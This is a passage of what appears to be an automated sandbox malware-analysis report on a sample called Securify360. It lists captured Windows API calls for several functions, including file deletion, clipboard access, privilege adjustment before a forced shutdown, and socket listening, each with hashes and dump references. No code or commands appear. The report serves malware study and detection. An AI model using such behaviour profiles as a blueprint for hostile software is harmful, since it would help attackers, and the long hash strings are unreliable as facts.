                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00FF44C1
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00FF44D3
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00FF44E2
                                                                                              • LockResource.KERNEL32(?), ref: 00FF44EE
                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FF454F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                              • String ID:
                                                                                              • API String ID: 1433390588-0
                                                                                              • Opcode ID: 415b3b9565a155008b0b6be54ee406a75df9db388d58749815e3d7024a784947
                                                                                              • Instruction ID: ed00529924f75d9581d3953a4497e9cda2b4178239038bd31f7932b6832ee45f
                                                                                              • Opcode Fuzzy Hash: 415b3b9565a155008b0b6be54ee406a75df9db388d58749815e3d7024a784947
                                                                                              • Instruction Fuzzy Hash: B931D27190031AABDB21AF61EC48EBF7BADEF04300F184416FE55E2158D739EA10DBA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: fb21912d31862b42ae84baa46c697870ac2ab6f447240f11262dbe3282b25484
                                                                                              • Instruction ID: 098e16c156b2656362bd5ff0688c51a277d54bc5d368e90ba656242844d35786
                                                                                              • Opcode Fuzzy Hash: fb21912d31862b42ae84baa46c697870ac2ab6f447240f11262dbe3282b25484
                                                                                              • Instruction Fuzzy Hash: E421A3352013109FEB32AF64EC0DF2E77A8EF48711F10805AFA85DB295DB79A901DB94
                                                                                              APIs
                                                                                                • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                                                                • Part of subcall function 00FF4FEC: GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00FF3D96
                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FF3E3E
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00FF3E51
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FF3E6E
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF3E90
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FF3EAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 4002782344-1173974218
                                                                                              • Opcode ID: d6f381986d419dda69d9b155b91028907015f8882af791592b86b798c92640dc
                                                                                              • Instruction ID: e53b8bde3509cdb874f5175d3ddb1198f8666585d29b83094f91f260485b38c1
                                                                                              • Opcode Fuzzy Hash: d6f381986d419dda69d9b155b91028907015f8882af791592b86b798c92640dc
                                                                                              • Instruction Fuzzy Hash: 70517E7180111DAACF15EBA0CD929FEB779AF12311F200165E546B31A2EF396F0DEB60
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FFFA83
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FFFB96
                                                                                                • Part of subcall function 00F952B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F952E6
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00FFFAB3
                                                                                              • _wcscmp.LIBCMT ref: 00FFFAC7
                                                                                              • _wcscmp.LIBCMT ref: 00FFFAE2
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 00FFFB80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2185952417-438819550
                                                                                              • Opcode ID: 5023d1ca6fb484bf1cfa8ff9a9f86664c8d52cb4113dfd265be556aa530e3934
                                                                                              • Instruction ID: 6a45087a721f1039001cd2114548870a3f6cb0ae3040f0feff59d1c232ad5728
                                                                                              • Opcode Fuzzy Hash: 5023d1ca6fb484bf1cfa8ff9a9f86664c8d52cb4113dfd265be556aa530e3934
                                                                                              • Instruction Fuzzy Hash: A8419F71D4021E9FDF24DF64CC59AEEBBB4FF05350F144066E915A22A1EB349A48DB90
                                                                                              APIs
                                                                                                • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                                                                • Part of subcall function 00FF4FEC: GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00FF407C
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FF40CC
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF40DD
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FF40F4
                                                                                              • FindClose.KERNEL32(00000000), ref: 00FF40FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: d90f3bc47ffa49d7471f556faa83a26d377976db0fa85ece293bd13476910f40
                                                                                              • Instruction ID: 9a5fcf0f5beea4adbe592035021e156dba4427f048058f34de9995f32b23bc5c
                                                                                              • Opcode Fuzzy Hash: d90f3bc47ffa49d7471f556faa83a26d377976db0fa85ece293bd13476910f40
                                                                                              • Instruction Fuzzy Hash: D83182710083499BC311EF64CC919BFB7E8BE96315F440A1DF5E582191EF29E90DE752
                                                                                              APIs
                                                                                                • Part of subcall function 00FE9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE93E3
                                                                                                • Part of subcall function 00FE9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE9410
                                                                                                • Part of subcall function 00FE9399: GetLastError.KERNEL32 ref: 00FE941D
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00FF57B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-194228
                                                                                              • Opcode ID: c651f1bae95f3b20cd639372a2d6d72358101dbe7137ec110649b422218d8d19
                                                                                              • Instruction ID: 971c1e20011245d8a07aa7e0b809737aa0dc567d198df99b75642ce56b9b3e01
                                                                                              • Opcode Fuzzy Hash: c651f1bae95f3b20cd639372a2d6d72358101dbe7137ec110649b422218d8d19
                                                                                              • Instruction Fuzzy Hash: C001FC73A5472EEBE73875659C8ABBB7658AF04F50F200125FB53D60F1D5595C00A150
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010069C7
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 010069D6
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 010069F2
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 01006A01
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 01006A1B
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 01006A2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 1279440585-0
                                                                                              • Opcode ID: bfd70e4f53109206e1079e8d1032816a15c6dc9a908918112750daeae3ce0c4f
                                                                                              • Instruction ID: c095812c35c4b1ec0d5b909260b1562fc2bef7da822a9f23c8f5699804ac6f65
                                                                                              • Opcode Fuzzy Hash: bfd70e4f53109206e1079e8d1032816a15c6dc9a908918112750daeae3ce0c4f
                                                                                              • Instruction Fuzzy Hash: 5721F230600201AFEB21EF68CC49B6EB7EAEF45720F108159F896A73D1CB75AC41DB90
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F91DD6
                                                                                              • GetSysColor.USER32(0000000F), ref: 00F91E2A
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00F91E3D
                                                                                                • Part of subcall function 00F9166C: DefDlgProcW.USER32(?,00000020,?), ref: 00F916B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorProc$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3744519093-0
                                                                                              • Opcode ID: 36b6f4aabeedade376b96342280134fa035ff3c09caa1451180bfc43a920973f
                                                                                              • Instruction ID: 6ad1e91023b26437b3725cd672f7bff657145b694c725ee14c5957499b1e228e
                                                                                              • Opcode Fuzzy Hash: 36b6f4aabeedade376b96342280134fa035ff3c09caa1451180bfc43a920973f
                                                                                              • Instruction Fuzzy Hash: 85A1447950550BBAFF39AA698D4AFBF369CFB41321F24012FF442C6185CA299C01F276
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00FFC329
                                                                                              • _wcscmp.LIBCMT ref: 00FFC359
                                                                                              • _wcscmp.LIBCMT ref: 00FFC36E
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00FFC37F
                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FFC3AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 2387731787-0
                                                                                              • Opcode ID: 5daabe9927213aeeb90dfc4a5463b1be5c962ed1ed8338338c1b1f326c336294
                                                                                              • Instruction ID: 981815eeca388ae5798f74f64b85f3ab7cce8388d2b52b60599e29206c560a1d
                                                                                              • Opcode Fuzzy Hash: 5daabe9927213aeeb90dfc4a5463b1be5c962ed1ed8338338c1b1f326c336294
                                                                                              • Instruction Fuzzy Hash: 0751AC75A0461A8FD714DF68C990EAAB3E4FF49320F10421DFA5687361DB34AD05EB91
                                                                                              APIs
                                                                                                • Part of subcall function 01008475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010084A0
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 01006E89
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 01006EB2
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 01006EEB
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 01006EF8
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 01006F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 99427753-0
                                                                                              • Opcode ID: a266ff56dee939fb22921738192d6cf349d3fb4897fc092ee97c03dda38ef4f9
                                                                                              • Instruction ID: d2fe1f497050b76d7f6a7304948d17b562c2e0b0a6118ac140097507dd834269
                                                                                              • Opcode Fuzzy Hash: a266ff56dee939fb22921738192d6cf349d3fb4897fc092ee97c03dda38ef4f9
                                                                                              • Instruction Fuzzy Hash: 5641E475600300AFFF21AF64DC86F7E73E9AB14B14F048459F945AB3C2DA78AD029B91
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 80c9b0bf1152828b76514fc5568d978c7e06e1e0e51596d0d219f76787d6de20
                                                                                              • Instruction ID: 93d618d537f78f93c8ce3680938e5c612c18ab259694d2a2c3ba179ecbe731e9
                                                                                              • Opcode Fuzzy Hash: 80c9b0bf1152828b76514fc5568d978c7e06e1e0e51596d0d219f76787d6de20
                                                                                              • Instruction Fuzzy Hash: 2311E6323403115FF7315F2A8C84A2E7B99FF86721B504029F885DB249CB7C99018AE1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime__swprintf
                                                                                              • String ID: %.3d$WIN_XPe
                                                                                              • API String ID: 2070861257-2409531811
                                                                                              • Opcode ID: f35c36ec185c0cf768e0b51e0ffc1d6debc7c0f086d25a7296f59153e46048b5
                                                                                              • Instruction ID: fa3132c32f43ddd33dd8776663b215922264f35e242dae829fa430457f4f1c86
                                                                                              • Opcode Fuzzy Hash: f35c36ec185c0cf768e0b51e0ffc1d6debc7c0f086d25a7296f59153e46048b5
                                                                                              • Instruction Fuzzy Hash: 56D01273854218FBCB18AA91DC48FF9777DAB04300F680053F546A2104EA359748BB22
                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,01001ED6,00000000), ref: 01002AAD
                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01002AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 599397726-0
                                                                                              • Opcode ID: b2d27b12da9d501aa72045f01b5f693e07a7b53c01ac2da29b064893382539cb
                                                                                              • Instruction ID: a6cd08794b64828b2b65caa133791dec1d7e88cad96cd6a03d22166a41c2a4a3
                                                                                              • Opcode Fuzzy Hash: b2d27b12da9d501aa72045f01b5f693e07a7b53c01ac2da29b064893382539cb
                                                                                              • Instruction Fuzzy Hash: 7241F571A00709FFFB22DE59CC89EBFB7ECEB40754F10405AF685A6181DA719E819B60
                                                                                              APIs
                                                                                                • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                                                                • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE93E3
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE9410
                                                                                              • GetLastError.KERNEL32 ref: 00FE941D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1922334811-0
                                                                                              • Opcode ID: 8d3e27b1895221290ac7653a8462fb0ce998e1044acbfe089cb591a93a3d58da
                                                                                              • Instruction ID: 0ae3e11462b044f79b97e21c58a1f202a0585b6f0f01309666dbce29fcf17c78
                                                                                              • Opcode Fuzzy Hash: 8d3e27b1895221290ac7653a8462fb0ce998e1044acbfe089cb591a93a3d58da
                                                                                              • Instruction Fuzzy Hash: 0311BFB2818304AFE728DF55DCC5D6BB7BCEB44310B20812EF48982280EB74AC41CB60
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FF42FF
                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00FF433C
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FF4345
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 33631002-0
                                                                                              • Opcode ID: 9b2266ef5331e4692033daf39bc011d906c775fb504f025f8ab023d4769e53ce
                                                                                              • Instruction ID: ade6b23c2401fdd2f83a2ec134e8f07d492ae0fa3e24d57f5ea33c7f64caaedc
                                                                                              • Opcode Fuzzy Hash: 9b2266ef5331e4692033daf39bc011d906c775fb504f025f8ab023d4769e53ce
                                                                                              • Instruction Fuzzy Hash: F81186B2D00229BEE7209AE89C44FBFBBBCEB09720F104156FA14E7190D2756D0497A1
                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FF4F45
                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF4F5C
                                                                                              • FreeSid.ADVAPI32(?), ref: 00FF4F6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
